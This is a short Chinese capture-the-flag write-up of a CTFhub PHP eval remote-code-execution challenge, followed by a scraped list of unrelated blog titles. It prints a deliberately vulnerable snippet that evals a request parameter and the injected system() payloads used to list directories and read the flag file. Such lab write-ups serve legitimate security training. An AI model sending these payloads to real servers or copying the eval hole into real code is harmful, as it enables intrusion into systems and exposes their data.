CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
左灯右行的爱情4 分钟前
4-Spring SPI机制解读
java·后端·spring
Code小翊5 分钟前
C语言bsearch的使用
java·c语言·前端
yong99905 分钟前
C#驱动斑马打印机实现包装自动打印
java·数据库·c#
云枫晖5 分钟前
Webapck系列-初识Webpack
前端·javascript
好记忆不如烂笔头abc6 分钟前
linux系统记录登录用户的所有操作
java·linux·服务器
慧一居士8 分钟前
HTML5 功能介绍,使用场景,对应功能点完整使用示例
前端
海在掘金6112716 分钟前
告别“undefined is not a function”:TS如何让你的函数调用更安心
前端
云中雾丽19 分钟前
Flutter中Stream的各种使用场景和实现方式
前端
CptW22 分钟前
第1篇(Ref):搞定 Vue3 Reactivity 响应式源码
前端·面试
葡萄城技术团队26 分钟前
基于 SpreadJS 的百万级数据在线数据透视表解决方案:技术解析与实践
前端